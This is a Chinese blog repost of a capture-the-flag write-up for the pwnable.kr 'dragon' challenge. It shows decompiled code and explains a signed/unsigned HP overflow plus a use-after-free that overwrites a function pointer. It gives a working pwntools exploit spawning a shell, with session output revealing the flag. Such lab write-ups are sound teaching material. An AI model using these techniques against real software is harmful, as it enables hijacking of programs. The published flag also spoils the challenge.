【pwnable.kr】 dragon

最新推荐文章于 2021-04-25 14:31:45 发布
最新推荐文章于 2021-04-25 14:31:45 发布
阅读量461 收藏 1
点赞数
分类专栏: Pwnable.kr

https://r00tnb.github.io/2018/02/27/pwnable.kr-dragon/

前言

这道题找溢出找了半天,游戏也玩了半天,唉最后还是细心读代码找出了漏洞。这是一个c语言不同类型比较隐式转换导致的漏洞,还是有点意思的。

分析

放ida逆向一下,程序代码逻辑有点长,不过认真读的话还是能理解的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

int PlayGame()
{
  int result; // eax@1

  while ( 1 )
  {
    while ( 1 )
    {
      puts("Choose Your Hero\n[ 1 ] Priest\n[ 2 ] Knight");
      result = GetChoice();
      if ( result != 1 && result != 2 )
        break;
      FightDragon(result);
    }
    if ( result != 3 )
      break;
    SecretLevel();
  }
  return result;
}

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62

void __cdecl FightDragon(int a1)
{
  char v1; // al@1
  void *v2; // ST1C_4@10
  int v3; // [sp+10h] [bp-18h]@7
  _DWORD *ptr; // [sp+14h] [bp-14h]@1
  _DWORD *v5; // [sp+18h] [bp-10h]@1

  ptr = malloc(0x10u);
  v5 = malloc(0x10u);
  v1 = Count++;
  if ( v1 & 1 )
  {
    v5[1] = 1;
    *((_BYTE *)v5 + 8) = 80;
    *((_BYTE *)v5 + 9) = 4;
    v5[3] = 10;
    *v5 = PrintMonsterInfo;
    puts("Mama Dragon Has Appeared!");
  }
  else
  {
    v5[1] = 0;
    *((_BYTE *)v5 + 8) = 50;
    *((_BYTE *)v5 + 9) = 5;
    v5[3] = 30;
    *v5 = PrintMonsterInfo;
    puts("Baby Dragon Has Appeared!");
  }
  if ( a1 == 1 )
  {
    *ptr = 1;
    ptr[1] = 42;
    ptr[2] = 50;
    ptr[3] = PrintPlayerInfo;
    v3 = PriestAttack((int)ptr, v5);
  }
  else
  {
    if ( a1 != 2 )
      return;
    *ptr = 2;
    ptr[1] = 50;
    ptr[2] = 0;
    ptr[3] = PrintPlayerInfo;
    v3 = KnightAttack((int)ptr, v5);
  }
  if ( v3 )
  {
    puts("Well Done Hero! You Killed The Dragon!");
    puts("The World Will Remember You As:");
    v2 = malloc(0x10u);
    __isoc99_scanf("%16s", v2);
    puts("And The Dragon You Have Defeated Was Called:");
    ((void (__cdecl *)(_DWORD *))*v5)(v5);
  }
  else
  {
    puts("\nYou Have Been Defeated!");
  }
  free(ptr);
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59

int __cdecl PriestAttack(int a1, void *ptr)
{
  int v2; // eax@1

  do
  {
    (*(void (__cdecl **)(void *))ptr)(ptr);
    (*(void (__cdecl **)(int))(a1 + 12))(a1);
    v2 = GetChoice();
    switch ( v2 )
    {
      case 2:
        puts("Clarity! Your Mana Has Been Refreshed");
        *(_DWORD *)(a1 + 8) = 50;
        printf("But The Dragon Deals %d Damage To You!\n", *((_DWORD *)ptr + 3));
        *(_DWORD *)(a1 + 4) -= *((_DWORD *)ptr + 3);
        printf("And The Dragon Heals %d HP!\n", *((_BYTE *)ptr + 9));
        *((_BYTE *)ptr + 8) += *((_BYTE *)ptr + 9);
        break;
      case 3:
        if ( *(_DWORD *)(a1 + 8) <= 24 )
        {
          puts("Not Enough MP!");
        }
        else
        {
          puts("HolyShield! You Are Temporarily Invincible...");
          printf("But The Dragon Heals %d HP!\n", *((_BYTE *)ptr + 9));
          *((_BYTE *)ptr + 8) += *((_BYTE *)ptr + 9);
          *(_DWORD *)(a1 + 8) -= 25;
        }
        break;
      case 1:
        if ( *(_DWORD *)(a1 + 8) <= 9 )
        {
          puts("Not Enough MP!");
        }
        else
        {
          printf("Holy Bolt Deals %d Damage To The Dragon!\n", 20);
          *((_BYTE *)ptr + 8) -= 20;
          *(_DWORD *)(a1 + 8) -= 10;
          printf("But The Dragon Deals %d Damage To You!\n", *((_DWORD *)ptr + 3));
          *(_DWORD *)(a1 + 4) -= *((_DWORD *)ptr + 3);
          printf("And The Dragon Heals %d HP!\n", *((_BYTE *)ptr + 9));
          *((_BYTE *)ptr + 8) += *((_BYTE *)ptr + 9);
        }
        break;
    }
    if ( *(_DWORD *)(a1 + 4) <= 0 )
    {
      free(ptr);
      return 0;
    }
  }
  while ( *((_BYTE *)ptr + 8) > 0 );
  free(ptr);
  return 1;
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

int SecretLevel()
{
  char s1; // [sp+12h] [bp-16h]@1
  int v2; // [sp+1Ch] [bp-Ch]@1

  v2 = *MK_FP(__GS__, 20);
  printf("Welcome to Secret Level!\nInput Password : ");
  __isoc99_scanf("%10s", &s1);
  if ( strcmp(&s1, "Nice_Try_But_The_Dragons_Won't_Let_You!") )
  {
    puts("Wrong!\n");
    exit(-1);
  }
  system("/bin/sh");
  return *MK_FP(__GS__, 20) ^ v2;
}

贴了几个关键的函数反编译代码,程序逻辑就不细说了,下面只记录关键部分。
SecretLevel函数中有一段执行shell的代码,但是没办法绕过判断。程序的漏洞在PriestAttack函数内,该函数在怪物的血量不大于0时跳出循环,但是记录怪物血量的变量是BYTE类型的,也就是unsigned char类型。与它比较的0默认情况是signed int
在c语言中不同类型的变量做比较会进行隐式类型转换,短长度类型会向较长长度类型转换,长度一致符号不同则向无符号转换,整数会向float转换,float会向double转换。这些网上都能搜到,所以就不继续说了。
那么这里的比较,BYTE就会向signed int转换。如果此时怪物血量为128,转换为二进制就是10000000,那么进行符号扩展时就变成了0xffffff80,而这个数其符号位为1所以是个负数,那么函数就会跳出循环并返回1。然而使怪物的血量达到128是可行的,可以使用第一个英雄挑战Mama Dragon,每个回合配合使用32技能使怪物自动增长血量,最后就能使怪物血量达到128。
接下来就是游戏胜利的判断了。

1
2
3
4
5
6
7
8
9

if ( v3 )
{
  puts("Well Done Hero! You Killed The Dragon!");
  puts("The World Will Remember You As:");
  v2 = malloc(0x10u);
  __isoc99_scanf("%16s", v2);
  puts("And The Dragon You Have Defeated Was Called:");
  ((void (__cdecl *)(_DWORD *))*v5)(v5);
}

 

进入该判断后,由于在前面的函数中v5这个堆指针已经释放了但是没有置0,这里马上又申请了一个大小一样的堆空间,那么根据glibc的堆分配策略这里的v2会引用之前v5指向的堆,接下来v2的内容可控下面又有v5函数的调用,所以就可以写入任意地址来执行了。这里算是一个UAF漏洞。
知道了利用方法下面给出exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

from pwn import *

def work(DEBUG):
    context(arch='i386',os='linux',log_level='info')
    if DEBUG:
        r = process('./dragon')
    else:
        r = remote('pwnable.kr',9004)
        
    target_addr = 0x08048dbf
    
    r.send("1\n"*3+'1\n'+"3\n3\n2\n"*4)
    r.recvuntil("You As:\n")
    r.sendline(p32(target_addr))
    r.interactive()

work(False)

 

1
2
3
4
5
6
7
8
9
10
11
12

root@1:~/桌面/test$ python 1.py
[+] Opening connection to pwnable.kr on port 9004: Done
[*] Switching to interactive mode
And The Dragon You Have Defeated Was Called:
$ ls
dragon
flag
log
super.pl
$ cat flag
MaMa, Gandhi was right! :)
$

总结

在c语言编码时得注意不同类型变量的比较,很有可能在隐式转换时造成漏洞。

子曰小玖
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Stanford Dragon Model
04-06
Stanford Dragon Model 包括max,ase,dwf,mtl,obj五种格式
pwnable.kr 简单题目详细笔记汇总
H4ppyD0g的博客
09-12 835
pwnable.kr fd pwnable.kr collision pwnable.kr bof pwnable.kr flag pwnable.kr passcode pwnable.kr random pwnable.kr input pwnable.kr leg pwnable.kr mistake pwnable.kr shellshock pwnable.kr coin1 pwnable.kr lotto pwnable.kr cmd1 pwnable.kr cmd2 pwnable.kr u
黑客练手入门| pwnable.kr—幼儿瓶—01:fd
Young的博客
02-03 659
[TOC] 前言 担心有人不知道pwnable.kr是什么,所以觉得有必要简单介绍一下它。 pwnable.kr介绍 pwnable.kr是一个非商业性的Wargame网站 ,它提供有关系统开发的各种pwn挑战。pwnable.kr的主要目的是'有趣'。并把每个挑战视为游戏。地址:http://pwnable.kr/ 该怎么玩 每个挑战都有对应的标记文件(类似于CTF),您需要阅读该文件并提交给pwnable.kr以获得相应的分数。为了读取标志文件,您需要一些有关编程,逆向工程,漏洞利用,
pwnable.kr详细通关秘籍(二)
xiaoi123的博客
09-27 752
i春秋作家:W1ngs 原文来自:pwnable.kr详细通关秘籍(二) 0x00 input 首先看一下代码: 可以看到程序总共有五步,全部都满足了才可以得到flag,那我们就一步一步来看 这道题考到了很多linux下的基本操作,参数输入、管道符、进程间通信等知识,推荐大家可以先看看《深入理解计算机系统这本书》,补补基础 1、Step1(argv) if(argc != 10...
pwnable.kr unexploitable题解
落日领航员の技术栈
04-25 746
前言 这次的大作业可以算是《漏洞分析》这门课有史以来难度最大的一次了。刚接触这道题的时候基本上没思路,加上心思浮躁,在网上疯狂找wp,看了十几篇依旧没看出个门道。于是决定静下心来,先仔细研读了几篇SROP相关的文章,了解基本原理,再一点一点地动手尝试。当然这个历程也是比较艰辛的,一次又一次把自己绕晕,失败,曾经很多次想过干脆换一道题算了,好在最后没有放弃,做出来了,收获满满。 代码分析 #include <stdio.h> void main(){ // no brute for
apachecn#apachecn-ctf-wiki#PWN-dragon-echo1-echo2-[pwnable.kr]CT
07-25
1. malloc person 2. malloc dragon 3. free dragon
mWeb:避免warning.or.kr
05-29
万维网避免warning.or.kr
pwnable_kr:壳牌我们玩游戏吗?
05-14
Pwnable.kr 此仓库将保存我对pwnable.kr wargames的解决方案 [婴儿奶瓶] fd 碰撞 转炉 旗帜 密码 随机的 输入 腿 错误 炮击 硬币1 二十一点 乐透 命令1 命令2 af 码图 Memcpy 汇编 取消连结 ...
bsg.kr_project
05-30
BSG.KR 项目简介使用 RIOT API 的历史搜索站点关键特点您可以查看英雄联盟游戏用户的最新20场比赛。 英雄联盟决定了每个补丁的冠军等级。如何使用贡献(如果有项目贡献者,写下来)参考(表示参考资源、代码片段和...
memberbook.co.kr:会员簿.co.kr
07-02
会员簿.co.kr 特拉维斯·CI 要求 $ brew install postgresql $ createdb $ psql psql(9.3.5) Type "help" for help. user=# create role memberbook with createdb login password 'memberbook'; 领班 RailsCast: ...
StandFord TensorFlow slide
09-18
Standford official tensorflow slides. Companies using Tensorflow ● Google ● OpenAI ● DeepMind ● Snapchat ● Uber ● Airbus ● eBay ● Dropbox ● A bunch of startups
Bunny Horse Dragon 三维点云数据
08-22
用户lsy20062039上传的Bunny、Horse、Dragon点云数据是m文件,我提取了三维点云数据,希望能帮助到需要的人。我用不到Brain点云,所以没有提取。文件后缀是点的个数,建议坐标值放大100倍后使用
dragon_点云-ply文件.zip
10-26
龙的三维点云数据文件,文件格式为PLY格式,希望对大家有所帮助
斯坦福点云数据
05-31
做三维重建和扫描仪的同学一定知道点云数据,斯坦福点云是是做研究的很好的数据源。
Stanford的Dragon点云数据
04-13
Dragon各个角度的点云数据,ply格式
pwnable.kr - fd
无节操
12-19 3612
题目: 题目链接:http://pwnable.kr/play.php ——> 连接登录:ssh fd@pwnable.kr -p2222查看文件及权限:ls -al看到flag文件,但是当前用户fd并没有读权限。 查看fd.ccat fd.c目标:执行system(“/bin/cat flag”); 则:strcmp(“LETMEWIN\n”, buf) == 0 则:buf =
pwnable.kr 入门pwn系列教程(1)
NoOneGroup
07-24 3060
博客已经转移 https://noone-hub.github.io/ 前言: 前段时间学了一段时间pwn,因为某些事断了下来,现在开始重新学习,现在立志要真正入门pwn,会编写漏洞利用(利用pwntools),会基本linux命令,因为pwn题目很多都是在linux下的,比较少在windows下。 正文: 今天通过pwnable.kr的第一道题目fd来学习pwn 题目就是这样,题目最...
通过pwnable.kr从零学pwn
热门推荐
giantbranch的专栏
07-31 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51992512 下面的这个地址很多ctf的学习资源都是有推荐的 挑战地址:http://pwnable.kr/play.php fd 首先不用说给了就直接连上去 看一下代码 重要函数:read ssize_t read(int fd,void *
Pwnable.kr题目Writeup持续更新~
iqiqiya的博客
03-12 2220
题目地址:https://pwnable.kr/play.php 第一题[fd]: Mommy! what is a file descriptor in Linux? * try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: https://youtu....
使用python 多线程爬取 https://www.ppomppu.co.kr/zboard/zboard.php?id=freeboard&hotlist_flag=999 网站
最新发布
05-30
这个程序会爬取 https://www.ppomppu.co.kr/zboard/zboard.php?id=freeboard&hotlist_flag=999 网站的前5页内容,并使用5个线程进行爬取,提高爬取效率。 你可以根据需要修改程序中的线程数量和爬取页面的数量。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值